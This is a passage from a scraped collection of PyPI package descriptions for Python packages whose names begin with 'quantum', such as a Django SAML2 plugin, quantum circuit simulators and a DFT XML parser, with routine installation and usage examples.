output.txtGenerate two Passphrases that are eight words long$ qdg -c 2 -w 8DocumentationFor more in-line help, run:$ qdg -hQDG\u2019s documentation lives atqdg.readthedocs.ioSeeThe Diceware Passphrase Home Pageto learn more about Diceware.MetaJustin M. Sloan -justinsloan.comPublic Domain. SeeLICENSE.txtfor more information.https://github.com/justinsloan/qdg"} +{"package": "quantum-distance-based-classifier", "pacakge-description": "The Quantum Distance-based classifier is a technique inspired by the classical k-Nearest Neighbors that leverage quantum properties to perform prediction. The package has been implemented in Qiskit.```\n from quantum_distance_based_classifier.quantum_distance_based_classifier import QuantumDistaceBasedClassifier\n from sklearn import preprocessing\n from sklearn.datasets import load_iris\n from sklearn.preprocessing import StandardScaler\n import numpy as np\n\n\n X, y = load_iris(return_X_y=True)\n\n n_features = 2\n X = X[:, :n_features] # Keep only n_features\n\n # Standardize and normalize the features\n X = StandardScaler().fit_transform(X)\n X = preprocessing.normalize(X, axis=1)\n\n # Initialize variables to store sampled instances\n sampled_X = []\n sampled_y = []\n\n # Loop through each class to sample instances\n for class_label in np.unique(y):\n class_indices = np.where(y == class_label)[0]\n sampled_indices = np.random.choice(class_indices, size=instances_per_class, replace=False)\n sampled_X.extend(X[sampled_indices])\n sampled_y.extend(y[sampled_indices])\n\n # Convert lists to numpy arrays\n sampled_X = np.array(sampled_X)\n sampled_y = np.array(sampled_y)\n\n qdbc = QuantumDistaceBasedClassifier()\n qdbc.fit(sampled_X, sampled_y)\n result = qdbc.predict(sampled_X[0])\n print(f\"Classification result: {result}\")\n ```"} +{"package": "quantum-django-saml2-auth", "pacakge-description": "Author:Fang LiVersion:Use 1.1.4 for Django <=1.9, 2.x.x for Django >= 1.9, Latest supported django version is 2.1This project aims to provide a dead simple way to integrate SAML2\nAuthentication into your Django powered app. Try it now, and get rid of the\ncomplicated configuration of SAML.Any SAML2 based SSO(Single-Sign-On) identity provider with dynamic metadata\nconfiguration is supported by this Django plugin, for example Okta.When you raise an issue or PRPlease note this library is used in tons of production environment and plays a mission-critical role in most deployment. It supports almost all django versions since 1.1.4. We need to be extremely careful when merging any changes.So most non-security features or enhancements will be REJECTED. please fork your own version or just copy the code as you need. I want to make this module dead simple and reliable. That means when you have it properly configured, you are not likely to get into any troubles in the future.The supports to new versions of django are still welcome and I\u2019ll make best effort to make it latest django compatible.DonateWe accept your donations by clicking the awesomeinstead of any physical transfer.DependenciesThis plugin is compatible with Django 1.6/1.7/1.8/1.9/1.10. Thepysaml2Python\nmodule is required.InstallYou can install this plugin viapip:# pip install django_saml2_author from source:# git clone https://github.com/fangli/django-saml2-auth\n# cd django-saml2-auth\n# python setup.py installxmlsec is also required by pysaml2:# yum install xmlsec1//or# apt-get install xmlsec1//Mac# brew install xmlsec1What does this plugin do?This plugin takes over Django\u2019s login page and redirect the user to a SAML2\nSSO authentication service. Once the user is logged in and redirected back,\nthe plugin will check if the user is already in the system. If not, the user\nwill be created using Django\u2019s default UserModel, otherwise the user will be\nredirected to their last visited page.How to use?Import the views module in your root urls.pyimportdjango_saml2_auth.viewsOverride the default login page in the root urls.py file, by adding these\nlinesBEFOREanyurlpatterns:# These are the SAML2 related URLs. You can change \"^saml2_auth/\" regex to# any path you want, like \"^sso_auth/\", \"^sso_login/\", etc. (required)url(r'^saml2_auth/',include('django_saml2_auth.urls')),# The following line will replace the default user login with SAML2 (optional)# If you want to specific the after-login-redirect-URL, use parameter \"?next=/the/path/you/want\"# with this view.url(r'^accounts/login/$',django_saml2_auth.views.signin),# The following line will replace the admin login with SAML2 (optional)# If you want to specific the after-login-redirect-URL, use parameter \"?next=/the/path/you/want\"# with this view.url(r'^admin/login/$',django_saml2_auth.views.signin),Add \u2018django_saml2_auth\u2019 to INSTALLED_APPSINSTALLED_APPS=['...','django_saml2_auth',]In settings.py, add the SAML2 related configuration.Please note, the only required setting isMETADATA_AUTO_CONF_URL.\nThe following block shows all required and optional configuration settings\nand their default values.SAML2_AUTH={# Metadata is required, choose either remote url or local file path'METADATA_AUTO_CONF_URL':'[The auto(dynamic) metadata configuration URL of SAML2]','METADATA_LOCAL_FILE_PATH':'[The metadata configuration file path]',# Optional settings below'DEFAULT_NEXT_URL':'/admin',# Custom target redirect URL after the user get logged in. Default to /admin if not set. This setting will be overwritten if you have parameter ?next= specificed in the login URL.'CREATE_USER':'TRUE',# Create a new Django user when a new user logs in. Defaults to True.'NEW_USER_PROFILE':{'USER_GROUPS':[],# The default group name when a new user logs in'ACTIVE_STATUS':True,# The default active status for new users'STAFF_STATUS':True,# The staff status for new users'SUPERUSER_STATUS':False,# The superuser status for new users},'ATTRIBUTES_MAP':{# Change Email/UserName/FirstName/LastName to corresponding SAML2 userprofile attributes.'email':'Email','username':'UserName','first_name':'FirstName','last_name':'LastName',},'TRIGGER':{'CREATE_USER':'path.to.your.new.user.hook.method','BEFORE_LOGIN':'path.to.your.login.hook.method',},'ASSERTION_URL':'https://mysite.com',# Custom URL to validate incoming SAML requests against'ENTITY_ID':'https://mysite.com/saml2_auth/acs/',# Populates the Issuer element in authn request'NAME_ID_FORMAT':FormatString,# Sets the Format property of authn NameIDPolicy element'USE_JWT':False,# Set this to True if you are running a Single Page Application (SPA) with Django Rest Framework (DRF), and are using JWT authentication to authorize client users'FRONTEND_URL':'https://myfrontendclient.com',# Redirect URL for the client if you are using JWT auth with DRF. See explanation below'ALLOWED_REDIRECT_HOSTS':[\"https://myfrontendclient.com\"]# Allowed hosts to redirect to using the ?next parameter}In your SAML2 SSO identity provider, set the Single-sign-on URL and Audience\nURI(SP Entity ID) tohttp://your-domain/saml2_auth/acs/ExplanationMETADATA_AUTO_CONF_URLAuto SAML2 metadata configuration URLMETADATA_LOCAL_FILE_PATHSAML2 metadata configuration file pathCREATE_USERDetermines if a new Django user should be created for new users.NEW_USER_PROFILEDefault settings for newly created usersATTRIBUTES_MAPMapping of Django user attributes to SAML2 user attributesTRIGGERHooks to trigger additional actions during user login and creation\nflows. These TRIGGER hooks are strings containing adotted module namewhich point to a method to be called. The referenced method should accept a\nsingle argument which is a dictionary of attributes and values sent by the\nidentity provider, representing the user\u2019s identity.TRIGGER.CREATE_USERA method to be called upon new user creation. This\nmethod will be called before the new user is logged in and after the user\u2019s\nrecord is created. This method should accept ONE parameter of user dict.TRIGGER.BEFORE_LOGINA method to be called when an existing user logs in.\nThis method will be called before the user is logged in and after user\nattributes are returned by the SAML2 identity provider. This method should accept ONE parameter of user dict.ASSERTION_URLA URL to validate incoming SAML responses against. By default,\ndjango-saml2-auth will validate the SAML response\u2019s Service Provider address\nagainst the actual HTTP request\u2019s host and scheme. If this value is set, it\nwill validate against ASSERTION_URL instead - perfect for when django running\nbehind a reverse proxy.ENTITY_IDThe optional entity ID string to be passed in the \u2018Issuer\u2019 element of authn request, if required by the IDP.NAME_ID_FORMATSet to the string \u2018None\u2019, to exclude sending the \u2018Format\u2019 property of the \u2018NameIDPolicy\u2019 element in authn requests.\nDefault value if not specified is \u2018urn:oasis:names:tc:SAML:2.0:nameid-format:transient\u2019.USE_JWTSet this to the boolean True if you are using Django Rest Framework with JWT authenticationFRONTEND_URLIf USE_JWT is True, you should set the URL of where your frontend is located (will default to DEFAULT_NEXT_URL if you fail to do so). Once the client is authenticated through the SAML/SSO, your client is redirected to the FRONTEND_URL with the user id (uid) and JWT token (token) as query parameters.\nExample: \u2018https://myfrontendclient.com/?uid=&token=\u2019\nWith these params your client can now authenticate will server resources.CustomizeThe default permissiondeniedpage and userwelcomepage can be\noverridden.To override these pages put a template named \u2018django_saml2_auth/welcome.html\u2019\nor \u2018django_saml2_auth/denied.html\u2019 in your project\u2019s template folder.If a \u2018django_saml2_auth/welcome.html\u2019 template exists, that page will be shown\nto the user upon login instead of the user being redirected to the previous\nvisited page. This welcome page can contain some first-visit notes and welcome\nwords. TheDjango user objectis available within the template as theusertemplate variable.To enable a logout page, add the following lines to urls.py, before anyurlpatterns:# The following line will replace the default user logout with the signout page (optional)url(r'^accounts/logout/$',django_saml2_auth.views.signout),# The following line will replace the default admin user logout with the signout page (optional)url(r'^admin/logout/$',django_saml2_auth.views.signout),To override the built in signout page put a template named\n\u2018django_saml2_auth/signout.html\u2019 in your project\u2019s template folder.If your SAML2 identity provider uses user attribute names other than the\ndefaults listed in thesettings.pyATTRIBUTES_MAP, update them insettings.py.For Okta UsersI created this plugin originally for Okta.The METADATA_AUTO_CONF_URL needed insettings.pycan be found in the Okta\nweb UI by navigating to the SAML2 app\u2019sSign Ontab, in the Settings box.\nYou should see :Identity Provider metadata is available if this application supports dynamic configuration.TheIdentity Provider metadatalink is the METADATA_AUTO_CONF_URL.How to ContributeCheck for open issues or open a fresh issue to start a discussion around a feature idea or a bug.Forkthe repositoryon GitHub to start making your changes to themasterbranch (or branch off of it).Write a test which shows that the bug was fixed or that the feature works as expected.Send a pull request and bug the maintainer until it gets merged and published. :) Make sure to add yourself toAUTHORS.Release Log2.2.1: Fixed is_safe_url parameters issue for django 2.12.2.0: ADFS SAML compatibility and fixed some issue for Django2.02.1.2: Merged #352.1.1: Added ASSERTION_URL in settings.2.1.0: Add DEFAULT_NEXT_URL. Issue #19.2.0.4: Fixed compatibility with Windows.2.0.3: Fixed a vulnerabilities in the login flow, thanks qwrrty.2.0.1: Add support for Django 1.101.1.4: Fixed urllib bug1.1.2: Added support for Python 2.7/3.x1.1.0: Added support for Django 1.6/1.7/1.8/1.91.0.4: Fixed English grammar mistakes"} +{"package": "quantumdl", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-dots", "pacakge-description": "soon"} +{"package": "quantum-dummy", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-dynamics", "pacakge-description": "Thequantum_dynamicspackage contains tools for simulation of 1D\ntime-dependent Schr\u00f6dinger equation. The package allows for simulation of 1D\nmodel potentials and time-dependent external interactions, e.g., an laser\nelectric field in the dipole approximation.This package has been created as a reference solution to an exercise in the\ncomputational physics course at Tampere University of Technology in Spring\n2018.The key numerical methods behind the package are:finite-difference approximation of the laplacian operator with Dirichlet\nboundary conditions at the endpoints of the simulation gridexponential mid-point rule for the time-evolution operatorkrylov-subspace based implementation of the matrix exponentialUpon successful installation, two executables are copied to your PATH:qdyn_laserplot_time_evolutionqdyn_laserThis simulates the electron in 1D soft coulomb potential (\u201c1D hydrogen\u201d) under\nlaser electric field with sin^2 envelope and cosine carrier wave. Please\nconsult the help of the script for all options:qdyn_laser--help.After a successful simulation, an outputfile of HDF5-format is created. It\ncontains the following datasets and groupscoordinate_gridThe gridpoints of the coordinate space used in the calculation.savetimesThe times corresponding to the saved wavefunction values in the file.wavefunctionA 2D array of values of the wavefunction. The first index corresponds tocoordinate_gridand the second index tosavetimes.final_wavefunctionWavefunction values at the end of the simulation.laserThe laser electric field foralltimesteps. First column is times, second\nthe laser electric field values.tise_hamiltonianThe time-independent part of the Hamiltonian matrix. It\u2019s saved as a sparse\nmatrix and can be loaded withquantum_dynamics.utils.load_sparse_matrixlike:from quantum_dynamics.utils import load_sparse matrix\nimport h5py\n\nwith h5py.File(\"myfile.h5\", \"r\") as f:\n H0 = load_sparse_matrix(f['tise_hamiltonian'])plot_time_evolutionThis can be used to visualize the time-evolved density calcualted withqdyn_laser. For usage instructions, please seeplot_time_evolution--help.AuthorsJanne Solanp\u00e4\u00e4"} +{"package": "quantum-edward", "pacakge-description": "Quantum EdwardInstallationYou can install Quantum Edward from the Python package managerpipusing:pip install qedward --userQuantum Edward at this point is just a small library of Python tools for\ndoing classical supervised learning on Quantum Neural Networks (QNNs).An analytical model of the QNN is entered as input into QEdward and the training\nis done on a classical computer, using training data already available (e.g.,\nMNIST), and using the famous BBVI (Black Box Variational Inference) method\ndescribed in Reference 1 below.The input analytical model of the QNN is given as a sequence of gate\noperations for a gate model quantum computer. The hidden variables are\nangles by which the qubits are rotated. The observed variables are the input\nand output of the quantum circuit. Since it is already expressed in the qc's\nnative language, once the QNN has been trained using QEdward, it can be\nrun immediately on a physical gate model qc such as the ones that IBM and\nGoogle have already built. By running the QNN on a qc and doing\nclassification with it, we can compare the performance in classification\ntasks of QNNs and classical artificial neural nets (ANNs).Other workers have proposed training a QNN on an actual physical qc. But\ncurrent qc's are still fairly quantum noisy. Training an analytical QNN on a\nclassical computer might yield better results than training it on a qc\nbecause in the first strategy, the qc's quantum noise does not degrade the\ntraining.The BBVI method is a mainstay of the \"Edward\" software library. Edward uses\nGoogle's TensorFlow lib to implement various inference methods (Monte Carlo\nand Variational ones) for Classical Bayesian Networks and for Hierarchical\nModels. H.M.s (pioneered by Andrew Gelman) are a subset of C.B. nets\n(pioneered by Judea Pearl). Edward is now officially a part of TensorFlow,\nand the original author of Edward, Dustin Tran, now works for Google. Before\nEdward came along, TensorFlow could only do networks with deterministic\nnodes. With the addition of Edward, TensorFlow now can do nets with both\ndeterministic and non-deterministic (probabilistic) nodes.This first baby-step lib does not do distributed computing. The hope is that\nit can be used as a kindergarten to learn about these techniques, and that\nthen the lessons learned can be used to write a library that does the same\nthing, classical supervised learning on QNNs, but in a distributed fashion\nusing Edward/TensorFlow on the cloud.The first version of Quantum Edward analyzes two QNN models called NbTrols\nand NoNbTrols. These two models were chosen because they are interesting to\nthe author, but the author attempted to make the library general enough so\nthat it can accommodate other akin models in the future. The allowable\nmodels are referred to as QNNs because they consist of 'layers',\nas do classical ANNs (Artificial Neural Nets). TensorFlow can analyze\nlayered models (e.g., ANN) or more general DAG (directed acyclic graph)\nmodels (e.g., Bayesian networks).This software is distributed under the MIT License.ReferencesR. Ranganath, S. Gerrish, D. M. Blei, \"Black Box Variational\nInference\",https://arxiv.org/abs/1401.0118https://en.wikipedia.org/wiki/Stochastic_approximationdiscusses Robbins-Monro conditionshttps://github.com/keyonvafa/logistic-reg-bbvi-blog/blob/master/log_reg_bbvi.pyhttp://edwardlib.org/https://discourse.edwardlib.org/"} +{"package": "quantum-entanglement", "pacakge-description": "soon"} +{"package": "quantum-esperanto", "pacakge-description": "Quantum Esperantois a fast parser of XML files output by DFT codes (vaspas of now) written in Cython.\nIt takes advantage of lxml, a Python wrapper aroundlibxml2library, and its Cython interface.\nXML files are parsed to a Python dictionary in a transparent way. It is really fast, up to 10 times faster than the\nparser used bypymatgenproject.InstallationThe development versions of librarieslibxml2andlibxsltmust be present in the system. Check with the command:$ xslt-configAlso, C compiler such asgccmust be present. The recommended way of installing Quantum Esperanto is withpipfrom PyPI:$ pip install quantum_esperantoIf one is interested in obtaining latest versions of the package, it can be installed using the source\ncode fromGitHub:$ git clone https://github.com/tilde-lab/quantum_esperanto\n$ cd quantum_esperanto\n$ pip install .The Python prerequisites for the package arenumpyandlxml(should be installed automatically withpip).It is possible to install the package in development mode. This will installCythonas well asnosetest suite.\nTo do it issue the following command after cloning the repository and changing the directory:$ cd quantum_esperanto\n$ pip install -e .[dev]After install it is possible to run several tests to check if the installation was completed successfully. It can be\ndone with the following commands inquantum_esperantodirectory:$ python setup.py testIf everything is OK, you\u2019re all set to start using the package.UsageThe parser can be used in a very simple way. First, the parser has to be instantiated, and then theparse_filemethod of the parser returns the dictionary of parsed values:fromquantum_esperanto.vaspimportVaspParserparser=VaspParser()d=parser.parse_file('vasprun.xml')The possible arguments for the parser are:recover(boolean, default:True) a flag that allows recovering broken XML. It is very useful in case of unfinished\ncalculations; however, it exits on the first XML error and the returned dictionary contains parsed values up to the\nfirst XML error only. When XML recovery is needed, a warning is printed to stderr.whitelist(list, default:None) the list of parent tag names that are only needed to parsed. If None, then all tags are parsed.Parsing resultThe result of parsing is a dictionary that follows the structure ofvasprun.xml. The keys of the dictionary are\neither tag names (fori,v,varraytags), ortag:tag nameconstruction (for tags that do have name\nattribute), or just tags themselves. The values are either tag contents converted to the right type (specified bytypetag attribute) or (in case of varrays and sets) Numpy arrays. Fortran overflows (denoted by*****) are converted to\nNaNs in case of float values and to MAXINT in case of integer values.Example:xml file1.433000001.433000001.433000001.43300000-1.43300000-1.43300000-1.433000001.43300000-1.4330000011.770598950.348918350.348918350.000000000.34891835-0.00000000-0.34891835-0.000000000.34891835-0.348918350.000000000.000000000.00000000resulting dictionary(printed withpprint):{'structure:primitive_cell':{'crystal':{'basis':array([[1.433,1.433,1.433],[1.433,-1.433,-1.433],[-1.433,1.433,-1.433]]),'rec_basis':array([[0.34891835,0.34891835,0.],[0.34891835,-0.,-0.34891835],[-0.,0.34891835,-0.34891835]]),'volume':11.77059895},'positions':array([[0.,0.,0.]])}}LicenseQuantum Esperanto is licensed under MIT license."} +{"package": "quantum-expresso-analize", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quantumflow", "pacakge-description": "QuantumFlow: A Quantum Algorithms Development ToolkitA cross-compiler for gate based models of quantum computingTutorialSource CodeIssue TrackerAPI DocumentationInstallationTo install the latest stable release:$ pip install quantumflowIn addition, install all of the external quantum libraries that QuantumFlow can interact with (such as cirq, qiskit, braket, ect.):$ pip install quantumflow[ext]To install the latest code from github ready for development:$ git clone https://github.com/gecrooks/quantumflow.git\n$ cd quantumflow\n$ pip install -e .[dev]"} +{"package": "quantum-gates", "pacakge-description": "Noisy Quantum GatesImplementation of the Noisy Quantum Gates model, published inDi Bartolomeo, 2023. It is a novel method to simulate the noisy behaviour of quantum devices by incorporating the noise directly in the gates, which become stochastic matrices.DocumentationsThe documentation for Noisy Quantum Gates can be accessed on the websiteRead the Docs.How to installRequirementsThe Python version should be 3.9 or later. Find your Python version by typingpythonorpython3in the CLI.\nWe recommend using the repo together with anIBM Quantum Labaccount, as it necessary for circuit compilation with Qiskit in many cases.Installation as a userThe library is available on the Python Package Index (PyPI) withpip install quantum-gates.Installation as a contributorFor users who want to have control over the source code, we recommend the following installation. Clone the repository\nfromGithub, create a new virtual environment, and activate the\nenvironment. Then you can build the wheel and install it with the package manager of your choice as described in the\nsectionHow to contribute. This will install all dependencies in your virtual environment,\nand install a working version of the library.QuickstartExecute the following code in a script or notebook. Add your IBM token to by defining it as the variable IBM_TOKEN = \"your_token\". Optimally, you save your token in a separate file that is not in your version control system, so you are not at risk of accidentally revealing your access token.# Standard librariesimportnumpyasnpimportjson# QiskitfromqiskitimportQuantumCircuit,transpilefromqiskit.visualizationimportplot_histogram# Own libraryfromquantum_gates.simulatorsimportMrAndersonSimulatorfromquantum_gates.gatesimportstandard_gatesfromquantum_gates.circuitsimportEfficientCircuitfromquantum_gates.utilitiesimportDeviceParametersfromquantum_gates.utilitiesimportsetup_backendIBM_TOKEN=\"\"We create a quantum circuit with Qiskit.circ=QuantumCircuit(2,2)circ.h(0)circ.cx(0,1)circ.barrier(range(2))circ.measure(range(2),range(2))circ.draw('mpl')We load the configuration from a json file or from code withconfig={\"backend\":{\"hub\":\"ibm-q\",\"group\":\"open\",\"project\":\"main\",\"device_name\":\"ibmq_manila\"},\"run\":{\"shots\":1000,\"qubits_layout\":[0,1],\"psi0\":[1,0,0,0]}}... and setup the Qiskit backend used for the circuit transpilation.backend_config=config[\"backend\"]backend=setup_backend(Token=IBM_TOKEN,**backend_config)run_config=config[\"run\"]This allows us to load the device parameters, which represent the noise of the quantum hardware.qubits_layout=run_config[\"qubits_layout\"]device_param=DeviceParameters(qubits_layout)device_param.load_from_backend(backend)device_param_lookup=device_param.__dict__()Last, we perform the simulation ...sim=MrAndersonSimulator(gates=standard_gates,CircuitClass=EfficientCircuit)t_circ=transpile(circ,backend,scheduling_method='asap',initial_layout=qubits_layout,seed_transpiler=42)probs=sim.run(t_qiskit_circ=t_circ,qubits_layout=qubits_layout,psi0=np.array(run_config[\"psi0\"]),shots=run_config[\"shots\"],device_param=device_param_lookup,nqubit=2)counts_ng={format(i,'b').zfill(2):probs[i]foriinrange(0,4)}... and analyse the result.plot_histogram(counts_ng,bar_labels=False,legend=['Noisy Gates simulation'])UsageWe recommend to read theoverviewof the documentation as a 2-minute preparation.ImportsThere are two ways of importing the package. 1) If you installed the code with pip, then the imports are simply of the form seen in theQuickstart.fromquantum_gates.simulatorsimportMrAndersonSimulatorfromquantum_gates.gatesimportstandard_gatesfromquantum_gates.circuitsimportEfficientCircuitfromquantum_gates.utilitiesimportDeviceParameters,setup_backendIf you use the source code directly and develop within the repository, then the imports becomefromsrc.quantum_gates._simulation.simulatorimportMrAndersonSimulatorfromsrc.quantum_gates._gates.gatesimportstandard_gatesfromsrc.quantum_gates._simulation.circuitimportEfficientCircuitfromsrc.quantum_gates._utility.device_parametersimport(DeviceParameters,setup_backend)FunctionalityThe main components are thegates,\nand thesimulator.\nOne can configure the gates with differentpulse shapes,\nand the simulator with differentcircuit classesandbackends. The circuit classes use a specific\nbackend for the statevector simulation.\nTheEfficientBackendhas the same functionality as\ntheStandardBackend, but is much more performant\nthanks to optimized tensor contraction algorithms. We also provide variousquantum algorithmsas circuits, and\nscripts to run the circuits with the simulator, the IBM simulator, and a real IBM backend. Last, all functionality is\nunit tested and one can get sample code from the unit tests.Unit TestsWe recommend running the unit tests once you are finished with the setup of your environment. As some tests need access\nto IBM devices, you have to create a script token.py in the configuration folder. You can check the token_template.py\nfor reference. Make sure that your token is active and you have accepted all license agreement with IBM in your IBM\naccount.How to contributeContributions are welcomed and should apply the usual git-flow: fork this repo, create a local branch named\n'feature-...'. Commit often to ensure that each commit is easy to understand. Name your commits\n'[feature-...] Commit message.', such that it possible to differentiate the commits of different features in the\nmain line. Request a merge to the mainline often. Contribute to the test suite and verify the functionality with the unit tests when using a different Python version or dependency versions. Please remember to follow thePEP 8 style guide, and add comments whenever it helps. The correspondingauthorsare happy to support you.BuildYou may also want to create your own distribution and test it. Navigate to the repository in your CLI of choice.\nBuild the wheel with the commandpython3 -m build --sdist --wheel .and navigate to the distribution withcd dist.\nUselsto display the name of the wheel, and runpip install .whlwith the correct filename.\nNow you can use your version of the library.CreditsPlease cite the work using the following BibTex entry:@article{PhysRevResearch.5.043210,\n title = {Noisy gates for simulating quantum computers},\n author = {Di Bartolomeo, Giovanni and Vischi, Michele and Cesa, Francesco and Wixinger, Roman and Grossi, Michele and Donadi, Sandro and Bassi, Angelo},\n journal = {Phys. Rev. Res.},\n volume = {5},\n issue = {4},\n pages = {043210},\n numpages = {19},\n year = {2023},\n month = {Dec},\n publisher = {American Physical Society},\n doi = {10.1103/PhysRevResearch.5.043210},\n url = {https://link.aps.org/doi/10.1103/PhysRevResearch.5.043210}\n}AuthorsThis project has been developed thanks to the effort of the following people:Giovanni Di Bartolomeo (dibartolomeo.giov@gmail.com)Michele Vischi (vischimichele@gmail.com)Francesco CesaMichele Grossi (michele.grossi@cern.ch)Sandro DonadiAngelo BassiRoman Wixinger (roman.wixinger@gmail.com)"} +{"package": "quantum-gateway", "pacakge-description": "Query a Quantum GatewayThis library allows a Verizon FiOS Quantum Gateway to be queried. It uses therequestslibrary to authenticate, log in, and query the web interface of the gateway.UsagePlease note for G1100 devices: as of the Firmware version 02.02.00.13 and UI version v1.0.388 https is the only way to get to the admin console. This is using a self signed cert as well. The code now defaults to https and ignores the self signed cert warning.# Importfromquantum_gatewayimportQuantumGatewayScanner# Connect to gateway via HTTPSgateway=QuantumGatewayScanner('192.168.1.1','your_password_here')# Or, connect to gateway via HTTPgateway=QuantumGatewayScanner('192.168.1.1','your_password_here',False)# Property is set to True if we successfully logged in, otherwise Falsegateway.success_init# Get list of all connected devices' MAC addressesgateway.scan_devices()# Get specific device's namegateway.get_device_name('mac address of device here')NotesTested on Verizon FiOS-provided gateway:UI Version:v1.0.388UnknownUnknownFirmware Version:02.02.00.133.1.0.123.1.1.17Model Name:FiOS-G1100FiOS-G3100FiOS-G3100Hardware Version:1.0311041104Please open a Githubissueor reply to the Home Assistant forumpostif you encounter any problems. Thanks!"} +{"package": "quantumgraphs", "pacakge-description": "No description available on PyPI."} +{"package": "quantumgrid", "pacakge-description": "AboutExterior Complex Scaled Finite-Element Element Discrete Variable\nRepresentation grid for general physics problems. In other words,\nquantumGrid is a package for solving a 1-D Schr\u00f6dinger equation\nfor an arbitrary potential.MotivationThis python package was created for a graduate course in time-dependent\nquantum mechanics at UC Davis. Given the ease of programming in python,\ngenerality and usefulness of a Finite Element Method - Discrete\nVariable Representation (FEM-DVR) grid for solving the Schr\u00f6dinger\nequation and simple scattering problems, we wanted to go open source\nand provide this numerical tool for others in the name of science!DocumentationFor a more details in using quantumGrid, checkout our manual here:https://quantumgrid.readthedocs.io.History0.0.1 (2020-05-31)First release on PyPI."} +{"package": "quantum-grove", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-gtk", "pacakge-description": "No description available on PyPI."} +{"package": "quantumics", "pacakge-description": "QuantumicsQuantumics is a python library that remove the risk post by the Neven's Law, recent and future developments in Computer Science and Technology by abstracting away the effect of the diversity of QPUs, CPUs manufacturers.Quantumics code(written mainly in python) enables you to run your code on different processors and then pick the most efficient processors to use for different algorithms in your code. Thus, optimizing computational speed of the global process. One code format works for all types of processors and future processors that may develop in the field of classical computing and quantum computing.You can learn more about Quantumics on our website in the link belowhttps://www.quantumics.netWhy you or your organization need this APIProcessing Unit Agnostic(QPU/CPU)Manufacturer Agnostic(DWave/IBM/Microsoft)Lowers Organization Risks due to Processing Unit's DisruptionWho needs this APIQuantum ScientistsMachine Learning EngineersNanotechnologists and BionanotechnologistsDevelopers Interested in taking developing on processing unit agnostic Quantum and Classical applicationsOrganisations with need for fast big data processing unitExamplesApplications of this APIOptimizations ProblemsMachine Learning ProblemsQuantum Computing Business SolutionsNanotechnology and Bionanotechnology SolutionsSynthetic Biology and PharmaceuticalsQuantum Finance Solutions"} +{"package": "quantum-image-classifier", "pacakge-description": "Quantum image classifierData useYou can generate synthetic data by calling the functiongenerate_synthetic_data(n_dim: int, n_clusters: int, m_samples: int)implemented indata_generator.py. You have to be aware that, in order to Nearest Centroid to work,n_dimhas to be power of 2.\nThis function returns a set of m_samples vectors X with a set of labels y associated with the vector in the same possition on X. Example:X, y = generate_synthetic_data(8, 4, 250)\ntrain_X = X[:200]\ntrain_y = y[:200]\ntest_X = X[200:]\ntest_y = y[200:]If you want, you can also use the MNIST dataset with a PCA function used to reduce the dimension to n components callingget_MNIST(n_components)implemented indata_loader.py. Same as with the synthetic data, you have to be aware to use only an power of 2 to make Nearest Centroid work. Example:train_X, train_y, test_X, test_y = get_MNIST(8)ClassifiersNearest centroidOnce you get the data, you need to create the object NearestCentroid with the training dataset that you want. After that, you can call the functionpredict(self, X: np.ndarray)owned by the defined object. Example:train_X, train_y, test_X, test_y = get_MNIST(8)\nnearest_centroid = NearestCentroid(train_X, train_y, n_dim)\nlabels_predicted = nearest_centroid.predict(test_X)"} +{"package": "quantum-inferno", "pacakge-description": "quantum-infernoQuantized Information Entropy, Nth OctaveCaveat Emptor: Early Release Dev VersionDescriptionComputes standardized time-frequency representations (TFRs) for power, information, and entropy,\nbuilt on the Gabor wavelets with minimal time-frequency uncertainty with\nlogarithmic constant-Q base 2 (binary) scales and frequency bands of quantized order N.All algorithms are based on FFTs for computational efficiency.\nThe short-term Fourier transform (STFT) is included as the baseline TFR.\nAlgorithms for the Continuous Wavelet Transform (CWT), Discrete Wavelet Transform (DWT),\nand Stockwell Transform (STX) are provided.Refer to the open access publications:Garc\u00e9s, M.A. Quantized Information in Spectral Cyberspace. Entropy 2023, 25, 419Garc\u00e9s, M.A. Quantized Constant-Q Gabor Atoms for\nSparse Binary Representations of Cyber-Physical Signatures. Entropy 2020, 22, 936Garc\u00e9s, M.A. On Infrasound Standards, Part 1 Time, Frequency, and Energy Scaling.\nInframatics 2013, 2, 13-35Recommended background reading in chronological order:Gabor, D. Theory of Communication, Part 3. Electr. Eng. 1946, 93, 445\u2013457.Shannon, C.E. The Mathematical Theory of Communication; University of Illinois Press: Urbana, IL, USA, 1998; [1949 first ed].Harris, F. J. On the Use of Windows for Harmonic Analysis with the Discrete Fourier Transform, Proceedings of the IEEE, 1978, 66 (1), 51-83.Cohen, L. Time-Frequency Analysis, Prentice-Hall, NI 07458, 1995.Stockwell, R. G., Mansina, L, and R. P. Lowe. Localization of the Complex Spectrum: The S Transform. Signal Processing, IEEE Transactions, 1996, 44 no. 4, 998-1001.Mallat, S. A Wavelet Tour of Signal Processing: The Sparse Way, 3rd ed.; Academic Press: Cambridge, MA, USA, 2009 [1998 first ed].Installationpipinstallquantum-infernoMore details will be placed in theInstallation guide.ExamplesFull examples can be found in theexamples documentation.API DocumentationCheck theAPI Documentation.ResourcesFound an issue? Submit abug report.MIT License"} +{"package": "quantuminspire", "pacakge-description": "Quantum Inspire SDKThe Quantum Inspire platform allows to execute quantum algorithms using the cQASM language.The software development kit (SDK) for the Quantum Inspire platform consists of:An API for theQuantum Inspireplatform (the QuantumInspireAPI class);Backends for:theProjectQ SDK;theQiskit SDK.For more information on Quantum Inspire seehttps://www.quantum-inspire.com/. Detailed information\non cQASM can be found in the Quantum Inspireknowledge base.Examples of more complex algorithms that make use of Quantum Inspire SDK can be found inQuantum Inspire Examples.InstallationThe Quantum Inspire SDK can be installed from PyPI via pip:pip install quantuminspireIn addition, to use Quantum Inspire through Qiskit or ProjectQ, install either or both of\nthe qiskit and projectq packages:pip install qiskit\npip install projectqInstalling from sourceThe source for the SDK can also be found at Github. For the default installation execute:git clone https://github.com/QuTech-Delft/quantuminspire\ncd quantuminspire\npip install .This does not install ProjectQ or Qiskit, but will install the Quantum Inspire backends for\nthose projects.If you want to include a specific SDK as a dependency, install with\n(e.g. for the ProjectQ backend):pip install .[projectq]To install both ProjectQ as well as Qiskit as a dependency:pip install .[qiskit,projectq]Installing for generating documentationTo install the necessary packages to perform documentation activities for SDK do:pip install -e .[rtd]The documentation generation process is dependent on pandoc. When you want to generate the\ndocumentation and pandoc is not yet installed on your system navigate\ntoPandocand follow the instructions found there to install pandoc.\nTo build the 'readthedocs' documentation do:cd docs\nmake htmlThe documentation is then build in 'docs/_build/html' and can be 